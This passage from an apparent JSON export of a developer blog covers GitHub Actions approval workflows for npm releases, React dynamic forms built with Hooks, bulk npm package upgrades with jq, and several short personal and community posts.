case. You can optionally provide an output URL to the run, and since we’ll be creating a draft Release, we can use that as the URL, but if you were deploying to somewhere, then you could use the URL of the deployed site.\nNow we can add the steps needed:\n1 2 3 4 5 6 7 8 9 10 11 12 steps: - uses: actions/checkout@v2 - name: Create Release id: create_release uses: actions/create-release@v1 env: GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} with: tag_name: ${{ github.ref }} release_name: Release ${{ github.ref }} draft: true prerelease: false Here we’re using actions/create-release to create a Release on GitHub and setting it to draft, as it’s not yet approved. This step has an id set, create_release, which is what we used to get the release URL for the Environment output and will need to upload artifacts shortly.\nYou can add the appropriate build/test/etc. 
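For reference, cutting that tag manually is only a couple of commands (a sketch, assuming npm's version command is managing the version number and tag):

npm version minor    # bumps package.json and creates the matching vX.Y.Z tag
git push && git push --tags    # pushing the tag is what kicks off the workflow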
steps after this one, again this is an example with a JavaScript project and I’m using npm, so change to your platform of choice:\n1 2 3 4 5 6 7 8 - uses: actions/setup-node@v1 with: node-version: ${{ env.NODE_VERSION }} - run: | npm ci npm run lint npm run build npm pack With this step we’re generating the package that will go to our package registry, but since we’re not publishing yet (that’s a future jobs responsibility), we need a way to make it available to the future jobs. For that we’ll publish it as an artifact of the workflow, using actions/upload-artifact:\n1 2 3 4 5 - name: Upload uses: actions/upload-artifact@v2 with: name: package path: "react-static-web-apps-auth/*.tgz" It’d also be good if the Release we’re creating had the package attached to it, if people want to download it rather than use a package registry, and we can do that with actions/upload-release-asset. The only problem is that we need to find out the full name of the package, including version, but that’s dynamic. To tackle this I create an environment variable containing the tag, extracted from GITHUB_REF using some bash magic:\n1 2 3 4 5 6 7 8 9 10 - run: echo "tag=${GITHUB_REF##*/v}" >> $GITHUB_ENV - name: Upload package to release uses: actions/upload-release-asset@v1 env: GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} with: upload_url: ${{ steps.create_release.outputs.upload_url }} asset_path: "react-static-web-apps-auth/aaronpowell-react-static-web-apps-auth-${{ env.tag }}.tgz" asset_name: "aaronpowell-react-static-web-apps-auth-${{ env.tag }}.tgz" asset_content_type: application/zip Again, we’re using the create_release step output to get the URL needed to upload the assets, another reason why you need to give that step an id.\nThe last thing that this job needs to do is let the future ones (in particular release) know what the id of the GitHub Release is, so it can publish it from draft. It doesn’t look like the step outputs are available across environments (and this is something I also hit with Azure Pipelines), so the solution I have for this is to put it in a text file and upload it as an artifact of the build.\n1 2 3 4 5 6 - run: echo ${{ steps.create_release.outputs.id }} >> release.txt - name: Upload uses: actions/upload-artifact@v2 with: name: release_id path: react-static-web-apps-auth/release.txt build is done, time for release.\nThe release stage Like build, the release stage needs to have an environment node that references the correct Environment name, this is how GitHub will know to apply the protection rules for you. But since this Environment doesn’t have any output, we’re not going to need to set a url property.\n1 2 3 4 5 release: needs: build runs-on: ubuntu-latest environment: name: release You’ll also notice the needs property in there as well. 
This tells us that this job can’t run until build has completed, which makes sense as we’re waiting on some outputs from there.\nThis phase of our workflow will only be responsible for removing the draft status from the GitHub Release, and to do that we’ll need to call the GitHub API and tell it which Release to edit, so we’ll need the artifact that we published at the end of the last job.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 steps: - name: Download package uses: actions/download-artifact@v2 with: name: release_id - run: echo "release_id=$(cat release.txt)" >> $GITHUB_ENV - name: Publish release uses: actions/github-script@v3 with: github-token: ${{secrets.GITHUB_TOKEN}} script: | github.repos.updateRelease({ owner: context.repo.owner, repo: context.repo.repo, release_id: process.env.release_id, draft: false }) We download the artifact with actions/download-artifact and then export the contents of the text file as an environment variable called release_id. Then, in the actions/github-script step we’ll use the updateRelease operation. Since actions/github-script is running as a JavaScript script, to access environment variables we can use process.env, and that gives us access to process.env.release_id as needed.\nWith this complete, our release is no longer in draft and we can publish the packages to their respective registries.\nPublishing to npm and GitHub Packages I’ll only show the workflow steps for npm here, as GitHub Packages is virtually the same and can be read about in this post.\nThis part of our workflow is rather straightforward since we’ve already built our package, all that’s left to do is download the artifact from the current run and publish to npm.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 publish-npm: needs: release runs-on: ubuntu-latest steps: - uses: actions/checkout@v2 - name: Download package uses: actions/download-artifact@v2 with: name: package - uses: actions/setup-node@v1 with: node-version: ${{ env.NODE_VERSION }} registry-url: https://registry.npmjs.org/ - run: npm publish $(ls *.tgz) --access public env: NODE_AUTH_TOKEN: ${{secrets.npm_token}} As we have the tgz file, we don’t need to repack, we’ll just pass the filename into npm publish (obtained from ls *.tgz), and since it’s a scoped package that everyone can use, we are setting the access to public.\nRunning the workflow With the new workflow ready to run, all it takes is a push with a tag for it to kick off. When the build phase completes, the reviewer(s) will receive an email and a notice on the Action in the GitHub UI.\nApprove it, and the rest of the stages will run through to completion (hopefully…).\nConclusion Throughout this post we’ve created a new GitHub Action workflow that will build and release a package, but still give us the safety net of requiring a manual approval step before it is ultimately released.\nYou can find the successful run I demonstrated here on my own project, and the commit diff from a previous project that released to npm automatically.\nHave you had a chance to implement anything using the approval process in GitHub Actions?
Let me know as I’d love to see what else people are doing with it.\n", "id": "2021-01-11-using-environments-for-approval-workflows-with-github" }, { "title": "2020 a Year in Review", "url": "https://www.aaron-powell.com/posts/2021-01-04-2020-a-year-in-review/", "date": "Mon, 04 Jan 2021 15:05:05 +1100", "tags": [ "year-review" ], "description": "A look back at the year that was", "content": "As is tradition, I’m starting off 2021 with my 2020 year in review blog post and it’s been fun looking back at the one I wrote last year, in particular my closing remark:\nHope to see you around some events!\nOh how things changed.\nMy original start to 2020 was looking like a lot of travel, but after our team on-site in Seattle and a ski trip to Japan in the start of March, that was it. I, like most of the world, was grounded and started transitioning to more online content.\nBlogging Blogging featured heavily in 2020, my goal was to keep around a post-per-week cadence, and I hit close to that with 50 posts across the year (slightly down from the 58 the previous year), with a main series on GraphQL and Azure and more broadly a lot of my content focused on Azure Static Web Apps which went into preview and GitHub Actions, which I’ve been using a lot (and not just because it ties into Static Web Apps).\nPresenting Online With in-person events on hold, many communities looked to online as an option. I covered topics like getting started with Docker, using Blazor with Static Web Apps and TypeScript + GraphQL + GitHub Codespaces.\nI even looked at how to interact with an audience through PowerPoint automation, something that I’m hoping to explore more this year as we continue with virtual presentations.\nAnd I shared my learnings with running a virtual workshop and my observations with virtual events.\nThat said, I did do an in-person talk, which was going well until the power went out!\nStreaming Like nearly everyone I know, 2020 was the year I started streaming on Twitch. My streaming was a bit haphazard, tackling a few different projects and not completing them (hey, always time to start a new side project!). You can catch all the random streams I’ve done on YouTube, or the specific projects such as building a video calling app, building a timezone app or converting an ASP.NET Core app to Serverless.\nLooking Forward It’s tough to really think what 2021 will bring, with the uncertainty around COVID, and the broader economic impacts of it.\nI’m going to keep working on how to do online content effectively, shortly I’ll start sharing what I’ve learnt with the myriad of tools. Expect to see me around at online communities and events, while they might not be the same as in-person, there’s a lot of value that they can bring.\nAdditionally, this year I’m embarking on an ambitious project with my wife, we’re rebuilding our house. 
So expect to see some posts on here about the technical aspects I’m looking to tackle, from the networking infrastructure to home automation, and how to tackle it in a brand new house.\nAnd with that, stay safe, stay distant and stay masked up.\n", "id": "2021-01-04-2020-a-year-in-review" }, { "title": "Simplifying Auth With Static Web Apps and React", "url": "https://www.aaron-powell.com/posts/2020-12-21-simplifying-auth-with-static-web-apps-and-react/", "date": "Mon, 21 Dec 2020 15:41:00 +1100", "tags": [ "javascript", "azure", "serverless" ], "description": "I created a small npm package to make SWA auth simpler in React apps", "content": "It’s no secret that I’m a fan of Azure Static Web Apps and I’m constantly looking for ways to make it easier for people to get working with it.\nSomething I hadn’t done much with until recently was work with the Authentication and Authorization aspect of it; I knew it was there, but I wasn’t building anything that required it.\nWhile building a video chat app on Twitch I found myself jumping back and forth to the documentation to make sure that I was creating the login URLs correctly, loading the profiles, etc. and so it’s time to do something about it.\nIntroducing react-static-web-apps-auth I created a npm package, @aaronpowell/react-static-web-apps-auth, which helps simplify development.\nIt introduces a component, <StaticWebAppsAuthLogins />, which will display all the auth providers (you can hide them by setting their corresponding prop to false), as well as a <Logout /> component and a React Context provider, <UserInfoContextProvider>, to give up access to the current user profile.\nIf you’re interested in the process of building it, I streamed that, including setting up a GitHub Actions pipeline with package deployment (like I blogged recently).\n", "id": "2020-12-21-simplifying-auth-with-static-web-apps-and-react" }, { "title": "Leveling Up Online Presentations", "url": "https://www.aaron-powell.com/posts/2020-12-15-leveling-up-online-presentations/", "date": "Tue, 15 Dec 2020 11:41:34 +1100", "tags": [ "public-speaking" ], "description": "The result of me nerd-sniping myself", "content": "Like all good nerd snipes it starts with a tweet:\nWould anyone be interested in an "OBS for technical presenters session, where we look at tools to improve the experience of online presentations in interesting ways?\n— Aaron Powell (@slace) October 21, 2020 But the thing is, you’re not meant to do it to yourself… but here we are, 145 likes and 41 comments later, I guess people are interested in this content, so it’s time I tackle it.\nStarting with a problem Over the past year I’ve been spending a lot of time looking into how to make the most engaging online presentation experience that I can, as no one knows when we’ll be back to doing in-person events in the way we use to. As someone who does a lot of talks and tried to be very energetic in their presentations, regardless of what happens, I wanted to bring that same experience online.\nI haven’t come from a video production background so it was quite confusing as to how one gets started. I saw people talking about tools like Open Broadcaster Software (OBS) and NDI, setting up green screens and using sound boards. 
But everything I found was for the person who was streaming video games to Twitch, and while Twitch can be a useful platform for technical content (case in point, I have a Twitch stream), the experience streaming is very different to the experience of presenting at a conference.\nTalking with my friends and colleagues, we all had similar experiences. We’d worked some of this stuff out, but it was pieced together through experiments, trial and error, and calling each other making the other person a guinea pig (and hopefully not blowing out their ear drums).\nBridging the content gap So, I nerd sniped myself, what am I going to do about it? In the new year I’ll start putting together some video and written tutorials covering some of the key topics that I feel are important for people when they are doing online presentations, such as OBS, and how to get the most value out of them.\nI’m also contemplating doing some online “workshops”, where we can jump in together and see some of this stuff in action as a more “giving a talk” experience, in addition to pre-recorded content, so if that sounds interesting, let me know through any of the variety of comms channels I’m on.\nWhat this content isn’t The goal of this content will be around the technical tools to make an online present successful, but that’s only part of it. For speaker tips I’d encourage everyone to check out this great post by Sonia Cuff and video from pyconline AU 2020, which cover off a number of great tips about your physical space, and how to engage with a virtual audience. After all, you can have the most amazing technical setup, but if you can’t be seen or more importantly, heard, it’s all for nothing.\nNext steps With the end of the year virtually (ha!) upon us, I’m going to start this in 2021, so keep an eye out for the content as it starts coming out, and if there’s something specific you’d like to learn about, do get in contact.\n", "id": "2020-12-15-leveling-up-online-presentations" }, { "title": "Creating Dynamic Forms With React Hooks", "url": "https://www.aaron-powell.com/posts/2020-12-10-dynamic-forms-with-react-hooks/", "date": "Thu, 10 Dec 2020 07:58:10 +1100", "tags": [ "javascript" ], "description": "Dynamically generating forms can be a challenge, so let's break down how to do it with React Hooks", "content": "The other week my friend Amy Kapernick reached out because she was having a problem with React. She was working on a project that used a headless CMS to build and control multi page forms and the fields in it, including conditional fields/pages that appear/hide depending on the value of other fields. The headless CMS would then generate a JSON payload that was pulled into a Gatsby site and needed to be rendered as a React form that a user could walk through. 
While the form was building and rendering, her problem was working with different bits of state management and making sure to update the right things at the right time, and she needed another set of eyes on the problem.\nHaving built dynamic form generators in the past, built systems backed by generic form generators, and generally done a lot with dynamic forms, I knew just the sort of pain she was in for so I was happy to help.\nSo in this post, we’ll break down how you can make dynamic forms in React, including how to do conditional control over fields appearing and page navigation.\nDefining a data structure We’ll start by defining the data structure that we’ll use for this sample, but do keep in mind that the structure will be driven by the backend system the forms are designed in, so you’ll need to tweak accordingly.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 [ { "component": "page", "label": "Page 1", "_uid": "0c946643-5a83-4545-baea-055b27b51e8a", "fields": [ { "component": "field_group", "label": "Name", "_uid": "eb169f76-4cd9-4513-b673-87c5c7d27e02", "fields": [ { "component": "text", "label": "First Name", "type": "text", "_uid": "5b9b79d2-32f2-42a1-b89f-203dfc0b6b98" }, { "component": "text", "label": "Last Name", "type": "text", "_uid": "6eff3638-80a7-4427-b07b-4c1be1c6b186" } ] }, { "component": "text", "label": "Email", "type": "email", "_uid": "7f885969-f8ba-40b9-bf5d-0d57bc9c6a8d" }, { "component": "text", "label": "Phone", "type": "text", "_uid": "f61233e8-565e-43d0-9c14-7d7f220c6020" } ] } ] The structure we’ve got here is intended to be simple. It is made from an array of pages, with each page identified by the component value of page, and within that is an array of fields that contains the inputs, or groups of inputs (again, denoted by the component property).\nCreating the form With the data structure ready, it’s time to create the form. We’ll start with a new component called Form:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 import React from "react"; const Form = ({ formData }) => { const onSubmit = e => { e.preventDefault(); // todo - send data somewhere }; return ( <form onSubmit={onSubmit}> <p>todo...</p> </form> ); }; export default Form; For this demo, the form won’t submit anywhere, but we’ll prevent the default action using preventDefault. The component will receive the formData as a prop, so it’s up to the parent component to work out how to get the data and pass it over, again, for this demo we’ll have it hard coded in the codebase, but for Amy’s situation it was being fetched as part of the Gatsby rendering process and included in the output bundle.\nDefining state There’s a bit of state that we’re going to have to manage in the React components, such as which page of the form we’re on and the values of the Controlled Components. 
For this, we’ll use Hooks so that we can stick with function components.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 const Form = ({ formData }) => { const [page, setPage] = useState(0); const [currentPageData, setCurrentPageData] = useState(formData[page]); const onSubmit = e => { e.preventDefault(); // todo - send data somewhere }; return ( <form onSubmit={onSubmit}> <p>todo...</p> </form> ); }; The first bit of state is the index of the current page, which starts at 0, and the second is the data for the page, plucked from the array, so we don’t need to constantly grab it constantly and we can respond to it changing using the useEffect Hook if required.\nRendering the form fields Let’s start by defining a generic field in a file called Field.jsx:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 import React from "react"; const Field = ({ field, fieldChanged, type, value }) => { return ( <div key={field._uid}> <label htmlFor={field._uid}>{field.label}</label> <input type={type || field.component} id={field._uid} name={field._uid} value={value} onChange={e => fieldChanged(field._uid, e.target.value)} /> </div> ); }; export default Field; This will render out a label and input in a basic manner, update the HTML to the structure that’s required for your design (or render out fields from a form library like Formik). The two props that are likely to be of most interest as the value and fieldChanged. The value prop is the current value for the Controlled Component, which will come from the Form component itself (we’ve not implemented that yet) and fieldChanged will be used to update this main state list.\nLet’s go about rendering out the fields in the Form component:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 const Form = ({ formData }) => { const [page, setPage] = useState(0); const [currentPageData, setCurrentPageData] = useState(formData[page]); const onSubmit = e => { e.preventDefault(); // todo - send data somewhere }; return ( <form onSubmit={onSubmit}> <h2>{currentPageData.label}</h2> {currentPageData.fields.map(field => { switch (field.component) { case "field_group": return ( <FieldGroup key={field._uid} field={field} fieldChanged={fieldChanged} values={values} /> ); case "options": return ( <Option key={field._uid} field={field} fieldChanged={fieldChanged} value={values[field._uid]} /> ); default: return ( <Field key={field._uid} field={field} fieldChanged={fieldChanged} value={values[field._uid]} /> ); } })} </form> ); }; You’ll notice a few more types of fields rendered out here, I’ll skip their implementations in the blog post, but you can check out the full sample for them.\nWe’re iterating over currentPageData.fields and using a switch statement to work out what kind of field we want to render based on the field.component. it’s then a matter of passing in the right props. But there’s something missing, what are fieldChanged and values, they currently don’t exist.\nHandling user input To handle the user input, we’re going to need two things, somewhere to store that input, and a function to do the updating. 
Let’s start with the storage, which is going to be a new bit of state in Hooks:\n1 2 3 4 5 const Form = ({ formData }) => { const [page, setPage] = useState(0); const [currentPageData, setCurrentPageData] = useState(formData[page]); const [values, setValues] = useState({}); // snip The values object is going to act as a dictionary so we can do values[field._uid] to get the value out for a field, but as per the requirements of a Controlled Component, we need to initialise the value, and we can do that with the useEffect Hook:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 const Form = ({ formData }) => { const [page, setPage] = useState(0); const [currentPageData, setCurrentPageData] = useState(formData[page]); const [values, setValues] = useState({}); // this effect will run when the `page` changes useEffect(() => { const upcomingPageData = formData[page]; setCurrentPageData(upcomingPageData); setValues(currentValues => { const newValues = upcomingPageData.fields.reduce((obj, field) => { if (field.component === "field_group") { for (const subField of field.fields) { obj[subField._uid] = ""; } } else { obj[field._uid] = ""; } return obj; }, {}); return Object.assign({}, newValues, currentValues); }); }, [page, formData]); // snip This Effect has two dependencies, page and formData, so if either changes (although it really will only be page that changes) it will run. When it runs it’ll get the next page we’re going to from the page state value, and set that as the current page using setCurrentPageData. Once that’s done, we’ll initialise any new fields on the values state using a callback to the setValues updater function that uses a reduce method to iterate over the fields and builds up a new object containing the newly initialised fields. Finally, it’ll merge the newly initialised field values with any existing values to produce the new values state.\nTip: using Object.assign like this will merge the objects in the order specified, meaning the right-most object values will take precedence, so if you navigate backwards on the form, your previous values are still there.\nWith the values now available to the Controlled Components, all that’s left is creating a function to update them.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 const Form = ({ formData }) => { const [page, setPage] = useState(0); const [currentPageData, setCurrentPageData] = useState(formData[page]); const [values, setValues] = useState({}); // this effect will run when the `page` changes useEffect(() => { const upcomingPageData = formData[page]; setCurrentPageData(upcomingPageData); setValues(currentValues => { const newValues = upcomingPageData.fields.reduce((obj, field) => { if (field.component === "field_group") { for (const subField of field.fields) { obj[subField._uid] = ""; } } else { obj[field._uid] = ""; } return obj; }, {}); return Object.assign({}, newValues, currentValues); }); }, [page, formData]); const fieldChanged = (fieldId, value) => { setValues(currentValues => { currentValues[fieldId] = value; return currentValues; }); setCurrentPageData(currentPageData => { return Object.assign({}, currentPageData); }); }; // snip The fieldChanged function will receive the fieldId (field._uid) and the new value. 
When called it’ll update the values state with the new value and then force a render by faking an update of the currentPageData state value, using Object.assign.\nWe need to fake the currentPageData update when the values change so that render phase of our component will be run, if not, the map function won’t be aware of the updated values and the inputs will never show the entered data.\nNow our full form is looking like this:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 const Form = ({ formData }) => { const [page, setPage] = useState(0); const [currentPageData, setCurrentPageData] = useState(formData[page]); const [values, setValues] = useState({}); // this effect will run when the `page` changes useEffect(() => { const upcomingPageData = formData[page]; setCurrentPageData(upcomingPageData); setValues(currentValues => { const newValues = upcomingPageData.fields.reduce((obj, field) => { if (field.component === "field_group") { for (const subField of field.fields) { obj[subField._uid] = ""; } } else { obj[field._uid] = ""; } return obj; }, {}); return Object.assign({}, newValues, currentValues); }); }, [page, formData]); const fieldChanged = (fieldId, value) => { setValues(currentValues => { currentValues[fieldId] = value; return currentValues; }); setCurrentPageData(currentPageData => { return Object.assign({}, currentPageData); }); }; const onSubmit = e => { e.preventDefault(); // todo - send data somewhere }; return ( <form onSubmit={onSubmit}> <h2>{currentPageData.label}</h2> {currentPageData.fields.map(field => { switch (field.component) { case "field_group": return ( <FieldGroup key={field._uid} field={field} fieldChanged={fieldChanged} values={values} /> ); case "options": return ( <Option key={field._uid} field={field} fieldChanged={fieldChanged} value={values[field._uid]} /> ); default: return ( <Field key={field._uid} field={field} fieldChanged={fieldChanged} value={values[field._uid]} /> ); } })} </form> ); }; Adding navigation Buttons, the form is missing buttons to do anything, be it submit the data or navigate between steps, let’s add those now:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 const Form = ({ formData }) => { const [page, setPage] = useState(0); const [currentPageData, setCurrentPageData] = useState(formData[page]); const [values, setValues] = useState({}); // this effect will run when the `page` changes useEffect(() => { const upcomingPageData = formData[page]; setCurrentPageData(upcomingPageData); setValues(currentValues => { const newValues = upcomingPageData.fields.reduce((obj, field) => { if (field.component === "field_group") { for (const subField of field.fields) { obj[subField._uid] = ""; } } else { obj[field._uid] = ""; } return obj; }, {}); return Object.assign({}, newValues, currentValues); }); }, [page, formData]); const fieldChanged = (fieldId, value) => { setValues(currentValues => { currentValues[fieldId] = value; return currentValues; }); setCurrentPageData(currentPageData => { return Object.assign({}, currentPageData); }); }; const onSubmit = e => { e.preventDefault(); // todo - send data somewhere }; return ( <form onSubmit={onSubmit}> <h2>{currentPageData.label}</h2> 
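{/* Work out which input component to render for each field based on its "component" type; anything unrecognised falls back to the generic <Field> */}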
{currentPageData.fields.map(field => { switch (field.component) { case "field_group": return ( <FieldGroup key={field._uid} field={field} fieldChanged={fieldChanged} values={values} /> ); case "options": return ( <Option key={field._uid} field={field} fieldChanged={fieldChanged} value={values[field._uid]} /> ); default: return ( <Field key={field._uid} field={field} fieldChanged={fieldChanged} value={values[field._uid]} /> ); } })} {page > 0 && ( <button onClick={() => setPage(page - 1)}>Back</button> )} &nbsp; {page < formData.length - 1 && ( <button onClick={() => setPage(page + 1)}>Next</button> )} </form> ); }; For navigation we’ll increment or decrement the page index that we’re on, which will trigger the effect and update currentPageData, forcing a render of the new fields. The Back button only shows once we’re past the first page, and the Next button only shows while there are still pages ahead of us.\nAnd with that, the basics of our dynamic form are done, time to ship to production!\nBut in Amy’s case there were two more things that needed to be handled, let’s start with conditional fields.\nConditional fields It’s not uncommon to have a form where, when an option is set, other information is required from the user. This is where conditional fields come into play, and to support them let’s update our data structure a little bit:\n[ { "component": "page", "label": "Page 1", "_uid": "0c946643-5a83-4545-baea-055b27b51e8a", "fields": [ { "component": "field_group", "label": "Name", "_uid": "eb169f76-4cd9-4513-b673-87c5c7d27e02", "fields": [ { "component": "text", "label": "First Name", "type": "text", "_uid": "5b9b79d2-32f2-42a1-b89f-203dfc0b6b98" }, { "component": "text", "label": "Last Name", "type": "text", "_uid": "6eff3638-80a7-4427-b07b-4c1be1c6b186" } ] }, { "component": "text", "label": "Email", "type": "email", "_uid": "7f885969-f8ba-40b9-bf5d-0d57bc9c6a8d" }, { "component": "text", "label": "Phone", "type": "text", "_uid": "f61233e8-565e-43d0-9c14-7d7f220c6020" } ] }, { "component": "page", "label": "Page 2", "_uid": "3a30803f-135f-442c-ab6e-d44d7d7a5164", "fields": [ { "component": "options", "label": "Radio Buttons", "type": "radio", "_uid": "bd90f44a-d479-49ae-ad66-c2c475dca66b", "options": [ { "component": "option", "label": "Option 1", "value": "one" }, { "component": "option", "label": "Option 2", "value": "two" } ] }, { "component": "text", "label": "Conditional Field", "type": "text", "_uid": "bd90f44a-d479-49ae-ad66-c2c475daa66b", "conditional": { "value": "two", "field": "3a30803f-135f-442c-ab6e-d44d7d7a5164_bd90f44a-d479-49ae-ad66-c2c475dca66b" } } ] } ] We’ve added a second page, and the last field on that page has a new property, conditional, which has two properties: value, the value the field must have for it to be displayed, and field, the field that should hold that value, made up of the _uid of the page and the field.\nNow we’re going to have to update our rendering logic to make sure we only render the fields that should be displayed.
We’ll start by creating a function that returns whether a field should be rendered or not:\n1 2 3 4 5 6 7 8 const fieldMeetsCondition = values => field => { if (field.conditional && field.conditional.field) { const segments = field.conditional.field.split("_"); const fieldId = segments[segments.length - 1]; return values[fieldId] === field.conditional.value; } return true; }; The fieldMeetsCondition function is a function that returns a function, sort of like partial application in F#, we do this so that we can simplify how it’s passed to the Array.filter before the Array.map call.\nWithin the function it will attempt to find the field in the values dictionary and match it with the required value. If no condition exists then we’ll bail out and render the field.\nNow we can update our render logic:\n1 2 3 4 5 6 7 8 // snip return ( <form onSubmit={onSubmit}> <h2>{currentPageData.label}</h2> {currentPageData.fields .filter(fieldMeetsCondition(values)) .map((field) => { // snip And we’re conditionally showing fields based on user input. Now to conditionally show pages.\nConditional pages The last requirement Amy had was to be able to display steps based on the user input, so that steps could be skipped if they aren’t relevant. This is a little trickier than conditional fields, as we can no longer just increment the page index, we’ll need to search for the appropriate page index.\nLet’s extract a function to work out the next/previous process:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 const navigatePages = direction => () => { const findNextPage = page => { const upcomingPageData = formData[page]; if ( upcomingPageData.conditional && upcomingPageData.conditional.field ) { const segments = upcomingPageData.conditional.field.split("_"); const fieldId = segments[segments.length - 1]; const fieldToMatchValue = values[fieldId]; if (fieldToMatchValue !== upcomingPageData.conditional.value) { return findNextPage(direction === "next" ? page + 1 : page - 1); } } return page; }; setPage(findNextPage(direction === "next" ? page + 1 : page - 1)); }; const nextPage = navigatePages("next"); const prevPage = navigatePages("prev"); Again, we’ll use a function that returns a function, but this time we’ll pass in the direction of navigation, next or prev, and then it’ll work out whether to + or -, allowing us to reuse the function.\nThis function contains a recursive function called findNextPage that when the button is clicked we’ll call to start our discovery process. Within that function we’ll grab the next sequential page and if it doesn’t have any conditional information, we’ll return the index of it. If it does have a conditional field, we’ll unpack it in a similar fashion to the conditional field test and compare the required value to the user value, and if they don’t match, we’ll go to the next (or previous) page in the stack. We’ll repeat the process again until we find a page that meets the condition or a page without a condition.\nNote: There is a limitation here, if you start or end with conditional fields you can end up exceeding the index range because it doesn’t check if you’re hitting the edges. 
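One possible starting point, if you wanted to close that gap, is to bail out once the candidate index walks off either end of the form. This is just a sketch of the idea, not part of the original sample; it reuses the formData, values and direction variables that findNextPage already closes over:

const findNextPage = page => {
  // guard: stop recursing once we've stepped outside the valid page range
  if (page < 0 || page >= formData.length) {
    // clamp back to the nearest real page (you might prefer to treat this as "submit" instead)
    return Math.min(Math.max(page, 0), formData.length - 1);
  }

  const upcomingPageData = formData[page];
  if (upcomingPageData.conditional && upcomingPageData.conditional.field) {
    const segments = upcomingPageData.conditional.field.split("_");
    const fieldId = segments[segments.length - 1];

    if (values[fieldId] !== upcomingPageData.conditional.value) {
      return findNextPage(direction === "next" ? page + 1 : page - 1);
    }
  }

  return page;
};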
That is something you can tackle yourself.\nConclusion Throughout this post we’ve taken a look at how we can use React to create a dynamic form, starting with what state we need to store as React Hooks, how we can handle the user input with Controlled Components and eventually implemented conditional logic for showing fields and navigating between steps.\nYou can check out the full sample on Codesandbox:\n", "id": "2020-12-10-dynamic-forms-with-react-hooks" }, { "title": "Static Web Apps on DevOps Labs", "url": "https://www.aaron-powell.com/posts/2020-12-07-static-web-apps-on-devops-labs/", "date": "Mon, 07 Dec 2020 10:38:05 +1100", "tags": [ "serverless", "webdev", "javascript" ], "description": "Check out my session on DevOps Labs about Static Web Apps", "content": "A few weeks ago I sat down with Damian Brady (in our respective home offices 😂) to talk about Azure Static Web Apps for the DevOps Lab show.\nCheck out the session, with demo failures and all!\nNo really, we didn’t mean for the build to be broken, but it worked well!\n", "id": "2020-12-07-static-web-apps-on-devops-labs" }, { "title": "Bulk Updating Outdated npm Packages", "url": "https://www.aaron-powell.com/posts/2020-11-23-bulk-updating-outdated-npm-packages/", "date": "Mon, 23 Nov 2020 11:50:18 +1100", "tags": [ "javascript" ], "description": "Coming to a project with a lot of dependencies to update? Here's how to script it", "content": "Ever come back to a project you haven’t touched for a while, only to find out there’s a lot of outdated npm packages that you want to update? This is a situation I occasionally find myself in and I’d never thought of a good way to tackle it.\nFinding Outdated Packages First off, how do you know what’s outdated? We can use npm outdated for that and it’ll return something like this:\nIf you want some more information you can provide the --long flag and get more output, such as whether the package is in the dependencies or devDependencies list:\nIf the update is within the semver filter you have in your package.json, it’s easy to upgrade with npm upgrade, but if you’re in a situation like I found myself in from the above list, there’s a lot of major version upgrades needing to be done, and since they are beyond the allowed semver range it’s a non-starter.\nUpgrading Beyond SemVer Ranges How do we go upgrading beyond our allowed semver range? 
By treating it as a new install and specifying the @latest tag (or a specific version), like so:\nnpm install typescript@latest Doing this will install the latest version of TypeScript (4.1.2 at the time of writing), which is a major version “upgrade”, and it’s easy enough to do if you’ve only got one or two packages to upgrade, but I was looking at 19 packages in my repo to upgrade, so it would be a lot of copy/pasting.\nUpgrading from Output Something worth noting about the npm outdated command is that if you pass --json it will return JSON output, rather than a human-readable one, and this got me thinking.\nIf we’ve got JSON, we can use jq to manipulate it and build up a command to run from the command line.\nThe output JSON from npm outdated --json --long is going to look like this:\n{ "@types/istanbul-lib-report": { "current": "1.1.1", "wanted": "1.1.1", "latest": "3.0.0", "location": "node_modules/@types/istanbul-lib-report", "type": "devDependencies", "homepage": "https://github.com/DefinitelyTyped/DefinitelyTyped#readme" } } We’re starting with an object, but we want to treat each sub-object as a separate node in the data set, so we’ll turn it into an array using to_entries, which gives us this new output:\n[ { "key": "@types/istanbul-lib-report", "value": { "current": "1.1.1", "wanted": "1.1.1", "latest": "3.0.0", "location": "node_modules/@types/istanbul-lib-report", "type": "devDependencies", "homepage": "https://github.com/DefinitelyTyped/DefinitelyTyped#readme" } } ] This gives us an array of entries where key is the package name and value is the information about the upgrade for that package. As it’s now an array we can choose to filter it using whatever heuristics we want, and for the moment we’ll upgrade the dependencies separately from the devDependencies. We do that using the select function in jq:\nnpm outdated --json --long | jq 'to_entries | .[] | select(.value.type == "devDependencies")' The select function allows you to do whatever filtering you want, for example if you wanted to only update the TypeScript type definitions you could change the select to be select(.key | startswith("@types")).\nRunning this will give you a filtered output on the terminal, showing only the packages that match your select condition. The last step is to generate the new package install version:\nnpm outdated --json --long | jq 'to_entries | .[] | select(.value.type == "devDependencies") | .key + "@latest"' This specifies the @latest tag, but you could use .key + "@" + .value.latest if you wanted to install that exact version for tighter semver pinning.
